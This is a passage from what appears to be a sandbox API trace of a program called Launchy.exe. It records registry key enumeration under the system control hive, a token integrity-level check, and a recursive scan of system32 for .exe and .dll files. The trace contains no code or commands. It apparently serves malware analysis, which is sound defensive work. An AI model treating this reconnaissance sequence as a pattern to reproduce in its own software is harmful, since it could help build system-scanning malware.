RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a300 [0102.543] RegEnumKeyW (in: hKey=0x260, dwIndex=0x46, lpName=0x19fd50, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0102.543] lstrlenW (lpString="SafeBoot") returned 8 [0102.543] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a1e0 [0102.543] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a320 [0102.543] RegEnumKeyW (in: hKey=0x260, dwIndex=0x47, lpName=0x19fd50, cchName=0x104 | out: lpName="SAM") returned 0x0 [0102.543] lstrlenW (lpString="SAM") returned 3 [0102.543] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a380 [0102.543] RegEnumKeyW (in: hKey=0x260, dwIndex=0x48, lpName=0x19fd50, cchName=0x104 | out: lpName="ScEvents") returned 0x0 [0102.543] lstrlenW (lpString="ScEvents") returned 8 [0102.543] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x71a420 [0102.543] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a778 [0102.543] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a778 | out: hHeap=0x6f0000) returned 1 [0102.543] RegEnumKeyW (in: hKey=0x260, dwIndex=0x49, lpName=0x19fd50, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0102.543] lstrlenW (lpString="ScsiPort") returned 8 [0102.543] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a120 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a180 [0102.544] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4a, lpName=0x19fd50, cchName=0x104 | out: lpName="SecureBoot") returned 0x0 [0102.544] lstrlenW (lpString="SecureBoot") returned 10 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a610 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719f80 [0102.544] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719f80 | out: hHeap=0x6f0000) returned 1 [0102.544] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4b, lpName=0x19fd50, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0102.544] lstrlenW (lpString="SecurePipeServers") returned 17 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a700 [0102.544] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a700 | out: hHeap=0x6f0000) returned 1 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719f40 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a548 [0102.544] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4c, lpName=0x19fd50, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0102.544] lstrlenW (lpString="SecurityProviders") returned 17 [0102.544] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71a5e8 [0102.545] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a5e8 | out: hHeap=0x6f0000) returned 1 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71a598 [0102.545] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4d, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceAggregatedEvents") returned 0x0 [0102.545] lstrlenW (lpString="ServiceAggregatedEvents") returned 23 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a520 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71add0 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a8b8 [0102.545] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a8b8 | out: hHeap=0x6f0000) returned 1 [0102.545] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4e, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0102.545] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a6d8 [0102.545] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a6d8 | out: hHeap=0x6f0000) returned 1 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x719fe0 [0102.545] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719fe0 | out: hHeap=0x6f0000) returned 1 [0102.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x719da0 [0102.545] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719da0 | out: hHeap=0x6f0000) returned 1 [0102.545] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4f, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0102.546] lstrlenW (lpString="ServiceProvider") returned 15 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a930 [0102.546] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a930 | out: hHeap=0x6f0000) returned 1 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71a7c8 [0102.546] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a7c8 | out: hHeap=0x6f0000) returned 1 [0102.546] RegEnumKeyW (in: hKey=0x260, dwIndex=0x50, lpName=0x19fd50, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0102.546] lstrlenW (lpString="Session Manager") returned 15 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a4a8 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a4f8 [0102.546] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a4f8 | out: hHeap=0x6f0000) returned 1 [0102.546] RegEnumKeyW (in: hKey=0x260, dwIndex=0x51, lpName=0x19fd50, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0102.546] lstrlenW (lpString="SNMP") returned 4 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719e20 [0102.546] RegEnumKeyW (in: hKey=0x260, dwIndex=0x52, lpName=0x19fd50, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0102.546] lstrlenW (lpString="SQMServiceList") returned 14 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71af20 [0102.546] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719d80 [0102.547] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d80 | out: hHeap=0x6f0000) returned 1 [0102.547] RegEnumKeyW (in: hKey=0x260, dwIndex=0x53, lpName=0x19fd50, cchName=0x104 | out: lpName="Srp") returned 0x0 [0102.547] lstrlenW (lpString="Srp") returned 3 [0102.547] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719e40 [0102.547] RegEnumKeyW (in: hKey=0x260, dwIndex=0x54, lpName=0x19fd50, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0102.547] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0102.547] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a060 [0102.547] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a060 | out: hHeap=0x6f0000) returned 1 [0102.547] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71a638 [0102.547] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a638 | out: hHeap=0x6f0000) returned 1 [0102.547] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a980 [0102.547] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a980 | out: hHeap=0x6f0000) returned 1 [0102.547] RegEnumKeyW (in: hKey=0x260, dwIndex=0x55, lpName=0x19fd50, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0102.547] lstrlenW (lpString="StillImage") returned 10 [0102.547] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x719d60 [0102.548] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x71a060 [0102.548] RegEnumKeyW (in: hKey=0x260, dwIndex=0x56, lpName=0x19fd50, cchName=0x104 | out: lpName="Storage") returned 0x0 [0102.548] lstrlenW (lpString="Storage") returned 7 [0102.548] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a4f8 [0102.548] RegEnumKeyW (in: hKey=0x260, dwIndex=0x57, lpName=0x19fd50, cchName=0x104 | out: lpName="StorageManagement") returned 0x0 [0102.548] lstrlenW (lpString="StorageManagement") returned 17 [0102.548] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a638 [0102.548] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a638 | out: hHeap=0x6f0000) returned 1 [0102.548] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x71ad70 [0102.548] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ad70 | out: hHeap=0x6f0000) returned 1 [0102.548] RegEnumKeyW (in: hKey=0x260, dwIndex=0x58, lpName=0x19fd50, cchName=0x104 | out: lpName="StorPort") returned 0x0 [0102.548] lstrlenW (lpString="StorPort") returned 8 [0102.548] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719ec0 [0102.548] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719e60 [0102.549] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719e60 | out: hHeap=0x6f0000) returned 1 [0102.549] RegEnumKeyW (in: hKey=0x260, dwIndex=0x59, lpName=0x19fd50, cchName=0x104 | out: lpName="StSec") returned 0x0 [0102.549] lstrlenW (lpString="StSec") returned 5 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x719f00 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719ee0 [0102.549] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5a, lpName=0x19fd50, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0102.549] lstrlenW (lpString="SystemResources") returned 15 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a5e8 [0102.549] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a5e8 | out: hHeap=0x6f0000) returned 1 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71a4d0 [0102.549] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5b, lpName=0x19fd50, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0102.549] lstrlenW (lpString="TabletPC") returned 8 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a8e0 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x719cc0 [0102.549] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5c, lpName=0x19fd50, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0102.549] lstrlenW (lpString="Terminal Server") returned 15 [0102.549] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71a7c8 [0102.550] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a8b8 [0102.550] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5d, lpName=0x19fd50, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0102.550] lstrlenW (lpString="TimeZoneInformation") returned 19 [0102.550] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719ea0 [0102.550] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719d20 [0102.550] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x71af80 [0102.550] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71af80 | out: hHeap=0x6f0000) returned 1 [0102.550] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5e, lpName=0x19fd50, cchName=0x104 | out: lpName="Ubpm") returned 0x0 [0102.550] lstrlenW (lpString="Ubpm") returned 4 [0102.550] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719f80 [0102.550] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5f, lpName=0x19fd50, cchName=0x104 | out: lpName="usb") returned 0x0 [0102.550] lstrlenW (lpString="usb") returned 3 [0102.550] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719ce0 [0102.550] RegEnumKeyW (in: hKey=0x260, dwIndex=0x60, lpName=0x19fd50, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0102.551] lstrlenW (lpString="usbflags") returned 8 [0102.551] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71a688 [0102.551] RegEnumKeyW (in: hKey=0x260, dwIndex=0x61, lpName=0x19fd50, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0102.551] lstrlenW (lpString="usbstor") returned 7 [0102.551] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a660 [0102.551] RegEnumKeyW (in: hKey=0x260, dwIndex=0x62, lpName=0x19fd50, cchName=0x104 | out: lpName="VAN") returned 0x0 [0102.551] lstrlenW (lpString="VAN") returned 3 [0102.551] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719dc0 [0102.551] RegEnumKeyW (in: hKey=0x260, dwIndex=0x63, lpName=0x19fd50, cchName=0x104 | out: lpName="Video") returned 0x0 [0102.551] lstrlenW (lpString="Video") returned 5 [0102.551] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x719fc0 [0102.551] RegEnumKeyW (in: hKey=0x260, dwIndex=0x64, lpName=0x19fd50, cchName=0x104 | out: lpName="WalletService") returned 0x0 [0102.551] lstrlenW (lpString="WalletService") returned 13 [0102.551] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a5c0 [0102.551] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a930 [0102.551] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a930 | out: hHeap=0x6f0000) returned 1 [0102.552] RegEnumKeyW (in: hKey=0x260, dwIndex=0x65, lpName=0x19fd50, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0102.552] lstrlenW (lpString="wcncsvc") returned 7 [0102.552] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a728 [0102.552] RegEnumKeyW (in: hKey=0x260, dwIndex=0x66, lpName=0x19fd50, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0102.552] lstrlenW (lpString="Wdf") returned 3 [0102.552] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719d00 [0102.552] RegEnumKeyW (in: hKey=0x260, dwIndex=0x67, lpName=0x19fd50, cchName=0x104 | out: lpName="WDI") returned 0x0 [0102.552] lstrlenW (lpString="WDI") returned 3 [0102.552] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719e60 [0102.552] RegEnumKeyW (in: hKey=0x260, dwIndex=0x68, lpName=0x19fd50, cchName=0x104 | out: lpName="Windows") returned 0x0 [0102.552] lstrlenW (lpString="Windows") returned 7 [0102.552] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x71a570 [0102.552] RegEnumKeyW (in: hKey=0x260, dwIndex=0x69, lpName=0x19fd50, cchName=0x104 | out: lpName="WinInit") returned 0x0 [0102.552] lstrlenW (lpString="WinInit") returned 7 [0102.552] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a020 [0102.552] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a080 [0102.553] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6a, lpName=0x19fd50, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0102.553] lstrlenW (lpString="Winlogon") returned 8 [0102.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71a890 [0102.553] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6b, lpName=0x19fd50, cchName=0x104 | out: lpName="WMI") returned 0x0 [0102.553] lstrlenW (lpString="WMI") returned 3 [0102.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719f20 [0102.553] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6c, lpName=0x19fd50, cchName=0x104 | out: lpName="WorkplaceJoin") returned 0x0 [0102.553] lstrlenW (lpString="WorkplaceJoin") returned 13 [0102.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71a7f0 [0102.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719ca0 [0102.553] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6d, lpName=0x19fd50, cchName=0x104 | out: lpName="WPN") returned 0x0 [0102.553] lstrlenW (lpString="WPN") returned 3 [0102.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719f60 [0102.553] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6e, lpName=0x19fd50, cchName=0x104 | out: lpName="{7746D80F-97E0-4E26-9543-26B41FC22F79}") returned 0x0 [0102.553] lstrlenW (lpString="{7746D80F-97E0-4E26-9543-26B41FC22F79}") returned 38 [0102.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x719d40 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x71a000 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719fa0 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719fe0 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x71ad40 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719d80 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x71a040 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719da0 [0102.554] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6f, lpName=0x19fd50, cchName=0x104 | out: lpName="BGFX") returned 0x0 [0102.554] lstrlenW (lpString="BGFX") returned 4 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x719de0 [0102.554] RegEnumKeyW (in: hKey=0x260, dwIndex=0x70, lpName=0x19fd50, cchName=0x104 | out: lpName="BitlockerStatus") returned 0x0 [0102.554] lstrlenW (lpString="BitlockerStatus") returned 15 [0102.554] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71a5e8 [0102.555] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a6b0 [0102.555] RegEnumKeyW (in: hKey=0x260, dwIndex=0x71, lpName=0x19fd50, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0102.555] lstrlenW (lpString="hivelist") returned 8 [0102.555] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x71a638 [0102.555] RegEnumKeyW (in: hKey=0x260, dwIndex=0x72, lpName=0x19fd50, cchName=0x104 | out: lpName="hiveredirectionlist") returned 0x0 [0102.555] lstrlenW (lpString="hiveredirectionlist") returned 19 [0102.555] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x34) returned 0x70a018 [0102.555] RegEnumKeyW (in: hKey=0x260, dwIndex=0x73, lpName=0x19fd50, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0102.555] lstrlenW (lpString="SystemInformation") returned 17 [0102.555] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a908 [0102.555] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a908 | out: hHeap=0x6f0000) returned 1 [0102.555] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x71b130 [0102.555] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71b130 | out: hHeap=0x6f0000) returned 1 [0102.555] RegEnumKeyW (in: hKey=0x260, dwIndex=0x74, lpName=0x19fd50, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0102.555] lstrlenW (lpString="Winresume") returned 9 [0102.555] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71a700 [0102.555] RegEnumKeyW (in: hKey=0x260, dwIndex=0x75, lpName=0x19fd50, cchName=0x104 | out: lpName="winresume") returned 0x103 [0102.556] RegCloseKey (hKey=0x260) returned 0x0 [0102.556] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" " [0102.556] StrChrW (lpStart="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" ", wMatch=0x22) returned="\" " [0102.556] StrChrW (lpStart="\" ", wMatch=0x20) returned=" " [0102.557] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0102.557] GetVersion () returned 0x23f00206 [0102.557] GetCurrentProcess () returned 0xffffffff [0102.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x19ff20 | out: TokenHandle=0x19ff20*=0x260) returned 1 [0102.557] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x14, TokenInformation=0x19ff18, TokenInformationLength=0x4, ReturnLength=0x19ff24 | out: TokenInformation=0x19ff18, ReturnLength=0x19ff24) returned 1 [0102.557] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ff24 | out: TokenInformation=0x0, ReturnLength=0x19ff24) returned 0 [0102.557] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x719e00 [0102.557] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x19, TokenInformation=0x719e00, TokenInformationLength=0x14, ReturnLength=0x19ff24 | out: TokenInformation=0x719e00, ReturnLength=0x19ff24) returned 1 [0102.557] GetSidSubAuthorityCount (pSid=0x719e08*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x719e09 [0102.557] GetSidSubAuthority (pSid=0x719e08*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x719e10 [0102.557] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719e00 | out: hHeap=0x6f0000) returned 1 [0102.557] CloseHandle (hObject=0x260) returned 1 [0102.557] lstrlenW (lpString="") returned 0 [0102.557] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2) returned 0x718ca8 [0102.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff18 | out: lpSystemTimeAsFileTime=0x19ff18*(dwLowDateTime=0xcf7f698b, dwHighDateTime=0x1d63873)) [0102.558] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0102.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x220) returned 0x71b488 [0102.558] GetWindowsDirectoryW (in: lpBuffer=0x71b488, uSize=0xc | out: lpBuffer="C:\\WINDOWS") returned 0xa [0102.558] lstrcpyW (in: lpString1=0x71b49e, lpString2="system32" | out: lpString1="system32") returned="system32" [0102.558] lstrlenW (lpString="C:\\WINDOWS\\system32") returned 19 [0102.558] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xfffe) returned 0x71b6b0 [0102.657] lstrlenW (lpString="*.exe|*.dll") returned 11 [0102.657] lstrlenW (lpString=0x0) returned 0 [0102.657] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x71a6d8 [0102.658] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x72b6b8 [0102.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\*", lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a298 [0102.698] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.698] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8cac8250, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xffb177c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8cac8250, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0409", cAlternateFileName="")) returned 1 [0102.698] lstrlenW (lpString="0409") returned 4 [0102.698] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x72c918 [0102.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\0409\\*", lpFindFileData=0x72c918 | out: lpFindFileData=0x72c918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8cac8250, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xffb177c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8cac8250, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a2d8 [0102.699] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x72c918 | out: lpFindFileData=0x72c918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8cac8250, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xffb177c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8cac8250, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.700] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x72c918 | out: lpFindFileData=0x72c918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8cac8250, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xffb177c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 